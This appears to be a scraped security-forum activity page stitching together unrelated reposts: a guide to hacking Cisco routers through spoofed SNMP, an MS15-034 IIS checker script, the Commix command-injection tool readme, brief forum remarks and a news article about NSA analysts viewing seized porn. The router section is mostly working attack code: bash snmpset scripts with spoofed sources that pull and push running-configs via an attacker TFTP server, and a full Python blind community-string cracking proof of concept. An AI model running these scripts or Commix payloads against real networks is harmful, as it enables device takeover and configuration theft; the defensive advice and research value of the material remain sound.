packet comes from a allowed IP. One of the easiest way to discover what type of network device you are up against, is by running a ntp query. By configuring “ntp server x.x.x.x”, are we not only synchronizing the device to that time-server, but it also turns the device into a NTP server itself. This allows us to find some unwanted information like equipment type and Refid which is equal to the NTP server’s server, along with a possible target for NTP reflection attacks. Apply some common sense, whois lookups and brute DNS tools – it won’t take long before you know where the management serverpool is. Cisco devices vulnerable to CVE-2014-3309 also seem to be open for NTP queries like this. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 [/TD] [TD=class: crayon-code]ntp server 80.2.0.64 ntp access-group peer management [/TD] [/TR] [/TABLE] This can be avoided by configuring a access-list associated with NTP configuration, firewalling the device or Control Plane Policing. Hacking SNMP Blindfloded Spoofing UDP packets source address will bypass the SNMP access-list “management”, and by blasting away thousands of passwords/sec may find the SNMP community string. The question is, how do we know when we found the correct community string? By sending IP spoofed Object Identifiers (OID’s) to the SNMP Management Information Base (MIB), we are able to tell the router to execute a command IF our community string is accepted. Decided to do some performance testing on live equipment and a Cisco 881-k9 where only able to handle 40000 attacks/min due to poor CPU performance. Split a dictionary between 100 CPE’s like the 881-k9 and you will be able to test ~4mill passwords/min. So, how is this really done? [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: crayon-code]Spoof source IP: 80.2.0.64, Destination mr router: 88.0.3.10 Hello mr router. The secret is "public", please ping 80.200.43.20 - wrong secret, request dropped - Hello mr router. The secret is "private", please ping 80.200.43.20 - correct secret, request accepted - - sending ICMP packet to 80.200.43.20 as you asked for - Network sniffer detecting a ICMP packet from mr router(88.0.3.10) Correct secret was found for mr router between line(RTT+0.1sec) and line(current time) [/TD] [/TR] [/TABLE] We got the community – so how to get access? More spoofing! Send another batch of spoofed OID’s to the router, we are now able to tell the router to upload its configuration to a TFTP server. (I had some issues with TFTP in Kali, so I booted a Ubuntu machine running xinetd with the IP 80.200.43.21.) After analyzing the router configuration, we can make a few modifications like adding a new user and removing the management access-lists for VTY. Now we can upload the new configuration back to the router with similar OID’s asking the router to download a file from the TFTP server and import it to the running-config. How to protect your equipment 1. BCP 38/RFC 2827 Source-address filter your network, a router will stop any packets not matching the reverse route for the senders source address. BCP38 should be enabled at the edge of your network facing both customers and other Internet Service Providers. This does not only protect you and other against this type of attacks, but also UDP reflection DDoS attacks. Warning: A network with asymmetrical routing may experience issues with BCP38 2. SNMPv3 SNMP version 3 offers both username and password support. Spoofing SNMPv3 is way more difficult than SNMPv 1-2c and due to password and packet encryption, discovery handshake and message integrity checks. 3. Filtering Deny NTP and SNMP with Access Control Lists(ACL), Control Plane Policing (CoPP) or firewalls. 4. Testing Do a network scan on equipment before you deploy a new model to check for unwanted services and ports. Edit: after speaking with Cisco PSIRT, I was recommended the following materials to fortify and protect network devices. There won’t be any security advisory/CVE since UDP spoofing-attack is a known issue – even considering it’s a new attack vector. Cisco Guide to Harden Cisco IOS Device Team CYMRU – Secure IOS template Concept code Download config [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]#!/bin/bash STRING=private IP=88.0.3.10 SOURCEIP=80.2.0.64 TFTP=80.200.43.21 FILENAME=running-config iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1 iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP [/TD] [/TR] [/TABLE] Upload config [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]#!/bin/bash STRING=private IP=88.0.3.10 SOURCEIP=80.2.0.64 TFTP=80.200.43.21 FILENAME=change-config iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 4 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1 iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP [/TD] [/TR] [/TABLE] Blind Password cracking – POC [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 [/TD] [TD=class: crayon-code]#!/usr/bin/python import socket, sys, time from scapy.all import * from multiprocessing import Process, Array iptoping = '\x50\xc8\x2b\x14' # 80.200.43.20 in hex ipaddr = ['88.0.3.14','88.0.3.6','88.0.3.10'] # target routers spoofedserver = '80.2.0.64' # ntpq -c rv TARGET_CPE | grep refid # Need to be permitted by router's snmp ACL snmpfile = 'best-snmppasswords.txt' defaultdelay = 0.0011 rtt = 1 #ms delay to targets # check if loopback-interface with spoofed IP is up and running stest = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: stest.bind((spoofedserver, 0)) except: print "ifconfig lo:0 " + spoofedserver + " netmask 255.255.255.255 up" sys.exit() rtt = rtt/1000 defaultdelay = int(defaultdelay*1000000) def snmpscan(ip, delayhigh, stop, dictline, c, minline, maxline): # add delays and such f = open(snmpfile, 'r') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) delay = delayhigh[c]/1000000.0 s.bind((spoofedserver, 500+c)) counter = 1 for community in f: if stop[c] == True: return if (minline[c] <= counter and maxline[c] >= counter) or maxline[c] == 0: community = community.rstrip() snmp = [] # packet length need to be included in SNMP. length = str("%0.2x" % (len(community))).decode('hex') splen = str("%0.2x" % (len(community)+42)).decode('hex') xplen = str("%0.2x" % (len(community)+49)).decode('hex') yplen = str("%0.2x" % (len(community)+45)).decode('hex') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x1e\x4d\xa9\x90\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x06') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x1a\x91\xe1\x36\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x05') snmp.append('\x30' + xplen + '\x02\x01\x00\x04' + length + community + '\xa3\x2a\x02\x04\x6e\xaf\x5b\x8c\x02\x01\x00\x02\x01\x00\x30' '\x1c\x30\x1a\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x0f\x82\x4d\x04\x08\x61\x6e\x79\x5f\x6e\x61\x6d\x65') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x66\x9c\x88\x99\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x02\x82\x4d\x02\x01\x01') snmp.append('\x30' + yplen + '\x02\x01\x00\x04' + length + community + '\xa3\x26\x02\x04\x13\x3a\x66\x29\x02\x01\x00\x02\x01\x00\x30' '\x18\x30\x16\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x03\x82\x4d\x04\x04' + iptoping) snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x21\x98\x9b\xcd\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x04\x82\x4d\x02\x01\x01') # last hex = number of icmp packets snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x7c\xe9\x79\x42\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x01') for payload in snmp: s.sendto(payload, (ip, 161)) dictline[c] = counter time.sleep(delay) if stop[c] == True: return counter += 1 f.close() stop[c] = True def reply(packet): try: if packet[iCMP]: pos = ipaddr.index(packet[iP].src) except: return for x in processes: if x.name == ipaddr[pos]: minline[pos] = int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1 maxline[pos] = dictline[pos] if minline[pos] == maxline[pos]: f = open(snmpfile, 'r') g = 1 for lines in f: if g == maxline[pos]: print 'SNMP Community for', ipaddr[pos], 'is:', lines.rstrip() g += 1 else: print '%s snmp community found between line %d and %d in %s. Please wait while narrowing it down.'%(ipaddr[pos], int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1, dictline[pos], snmpfile) stop[pos] == True x.terminate() time.sleep(1) # wait for existing thread to stop dictline[pos] = 1 stop[pos] = False delay[pos] = delay[pos]*5 p = Process(target=snmpscan, name=ipaddr[pos], args=(ipaddr[pos], delay, stop, dictline, pos, minline, maxline)) processes[pos] = p p.start() if __name__ == "__main__": global processes processes = [] dictline = Array('i', [1]*len(ipaddr)) stop = Array('i', [False]*len(ipaddr)) minline = Array('i', [0]*len(ipaddr)) maxline = Array('i', [0]*len(ipaddr)) delay = Array('i', [defaultdelay]*len(ipaddr)) c = 0 for a in ipaddr: p = Process(target=snmpscan, name=a, args=(a, delay, stop, dictline, c, minline, maxline)) processes.append(p) p.start() c += 1 sniff(prn=reply, filter="icmp", store=0) [/TD] [/TR] [/TABLE] Sursa: https://0x41.no/hacking-networks-with-snmp/
  16. Nytro
    Microsoft expands its bug bounty programs to include Azure, Sway, and Project Spartan | VentureBeat | Security | by Emil Protalinski
  17. Nytro
    Se poate scoate butonul de Dislike din AdminCP, rapid.
  18. Nytro
    '''___. .___ __ __ \_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | |___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| \/ \/\/ \/ \/ \/ MS15-034 Checker Danger! This script has not been properly qa'd and will probably fail in terrible ways. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of an HTTP range request. -BF 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here ''' import socket import random ipAddr = "" hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" print " [*] Audit Started" client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req1) boringResp = client_socket.recv(1024) if "Microsoft" not in boringResp: print " [*] Not IIS" exit(0) client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req) goodResp = client_socket.recv(1024) if "Requested Range Not Satisfiable" in goodResp: print "[!!] Looks VULN" elif " The request has an invalid header name" in goodResp: print " [*] Looks Patched" else: print " [*] Unexpected response, cannot discern patch status" Sursa: http://pastebin.com/raw.php?i=ypURDPc4
      • 1
      • Upvote
  19. Nytro
    E misto modulul de fuzzing. Nu face mare lucru, dar luand la mana raspunsurile poate fi foarte util.
  20. Nytro
    Changes: A new attack mode has been added. A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time. Various other updates and additions.
  21. Nytro
    Cand am dat eu, probabil si acum: pix si hartie. Si sunt doua parti: Info si Mate.
  22. Nytro
    Ideea era sa faci privilege escalation/bypass UAC. Unde e folder-ul aplicatiei asteia, Program Files sau AppData? Daca e in Program Files, cacat, nu ai drept de scriere acolo ca "normal user". Apoi, aplicatia ruleaza ca Admin? Chiar daca trebuie pornita manual (adica nu la startup) si chiar daca apare promt-ul UAC, acesta o sa fie legitim, dar daca nu, exploit-urile lui "tunis-pula" sunt niste cacaturi inutile.
  23. Nytro
    "unserialize" is magic. In cel mai nasol sens al cuvantului.
  24. Nytro
    __ ___ ___ ___ ___ ___ ___ /\_\ __ _ /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </ \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ \/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b } +-- Automated All-in-One OS Command Injection and Exploitation Tool Copyright © 2015 Anastasios Stasinopoulos (@ancst) +-- General Information Commix (short for [comm]and njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language. Disclaimer The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!! Requirements Python version 2.6.x or 2.7.x is required for running this program. Installation Download commix by cloning the Git repository: git clone https://github.com/stasinopoulos/commix.git commix Usage Usage: python commix.py [options] Options -h, --help Show help and exit. --verbose Enable the verbose mode. --install Install 'commix' to your system. --version Show version number and exit. --update Check for updates (apply if any) and exit. Target This options has to be provided, to define the target URL. --url=URL Target URL. --url-reload Reload target URL after command execution. Request These options can be used, to specify how to connect to the target URL. --host=HOST HTTP Host header. --referer=REFERER HTTP Referer header. --user-agent=AGENT HTTP User-Agent header. --cookie=COOKIE HTTP Cookie header. --headers=HEADERS Extra headers (e.g. 'Header1:Value1\nHeader2:Value2'). --proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080'). --auth-url=AUTH_.. Login panel URL. --auth-data=AUTH.. Login parameters and data. --auth-cred=AUTH.. HTTP Basic Authentication credentials (e.g. 'admin:admin'). Injection These options can be used, to specify which parameters to inject and to provide custom injection payloads. --data=DATA POST data to inject (use 'INJECT_HERE' tag). --suffix=SUFFIX Injection payload suffix string. --prefix=PREFIX Injection payload prefix string. --technique=TECH Specify a certain injection technique : 'classic', 'eval-based', 'time-based' or 'file-based'. --maxlen=MAXLEN The length of the output on time-based technique (Default: 10000 chars). --delay=DELAY Set Time-delay for time-based and file-based techniques (Default: 1 sec). --base64 Use Base64 (enc)/(de)code trick to prevent false- positive results. --tmp-path=TMP_P.. Set remote absolute path of temporary files directory. --icmp-exfil=IP_.. Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3'). --alter-shell Use an alternative os-shell (Python). Usage Examples Exploiting Damn Vulnerable Web App python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4" Exploiting php-Charts 1.0 using injection payload suffix & prefix string: python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'" Exploiting OWASP Mutillidae using Extra headers and HTTP proxy: python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081" Exploiting Persistence using ICMP exfiltration technique : su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5 Sursa: https://github.com/stasinopoulos/commix
  25. Nytro
    NSA analysts are being paid to watch a LOT of porn Graham Cluley| April 6, 201512:45 am There's been a lot of concern about how intelligence agencies around the world have been covertly snooping on private emails, instant message communications and phone calls, but here's something you may not have realised. They also get to watch a lot of porn. The Daily Beast has the scoop, explaining that CIA and NSA analysts are tasked with examining graphic content that may have been recovered from computers and smartphones during the pursuit of alleged terrorists. Much of this content is retrieved by the NSA's controversial Tailored Access Operations (TAO) group, which said to have infected 50,000 systems around the worldwith malware and even intercepted Microsoft Windows crash error reports. In addition, according to the report, the examined content (which can contain disturbing snuff movies and child abuse images, as well as conventional pornography) is scooped up from "websites frequented by jihadists" and "in some cases" viewed in real-time as it is posted by people of interest. The NSA has reportedly provided its own private viewing room for those employed to watch porn. And it's not all beheading videos. Yes, these snuff films have become vital sources of clues for U.S. intelligence analysts. But vast majority of material these analysts are studying, according to current and former intelligence officials, is a very different sort of NSFW fare. "It's mostly porn," a former intelligence officer who worked on counterterrorism operations, told The Daily Beast. At the headquarters of the NSA in Ft. Meade, Md., another former intelligence officer said, there is a closed room set aside for watching porno clips. One of the reasons that intelligence agencies are checking out the porn videos of terrorists is, apparently, because they are very aware that groups could hide messages within them using steganography. Steganography is the technique of hiding a message within a digital graphic image - making it something that you won't be able to spot with the naked eye. By disguising a message in this way your hope is that anyone intercepting the communication won't realise it's true purpose, meaning it remains a secret until the recipient at the other end runs a program to extract the hidden message. It isn't entirely fanciful to imagine that terrorists might hide secret messages inside porn movies. In 2011, for instance, German police arrested a suspected al-Qaeda member, carrying a memory card. When the memory card was examined, Ars Technica reported in 2012, it was discovered to contain a password-protected folder that (when it eventually revealed its secrets) contained a pornographic video called "KickAss". Later it was determined that the "KickAss" porn flick contained its own secrets, disguised through steganography: Within that video, they discovered 141 separate text files, containing what officials claim are documents detailing al-Qaeda operations and plans for future operations—among them, three entitled "Future Works," "Lessons Learned," and "Report on Operations." Of course, simply watching a blue movie shouldn't be an effective way to tell if it contains data hidden through steganography, if the terrorist is doing their job properly. But I guess the agency would be considered remiss if they didn't have someonetasked with the onerous job of reading every document, checking every image, and watching every minute of video that has been seized. Although the porn angle is likely to generate some sniggers from the back of class, it actually sounds like a ghastly job, with the potential for people to be negatively impacted by some of the more harrowing content they must end up viewing. As such, regardless of whether you approve of some of the methods used by the NSA's TAO unit, it's good to hear that mental health professionals and counsellors are available to workers - who may be disturbed by the content they are paid to view. Side note: This isn't, of course, the first time that intelligence agencies have shown a lot of interest in watching movies of people without their clothes on. The UK's GCHQ spied on more than 1.8 million Yahoo users around the world for six months back in 2008 as part of "Operation Optic Nerve", in a gross invasion of privacy. According to one GCHQ document, between 3 and 11 percent of collected Yahoo webcam images contained sexually explicit content. Which makes me think, there must have been some poor sod whose job it was to count every time someone got nude on their Yahoo webcam chat. That's a pretty awful job too. Sursa: https://grahamcluley.com/2015/04/nsa-porn/
×
×
  • Create New...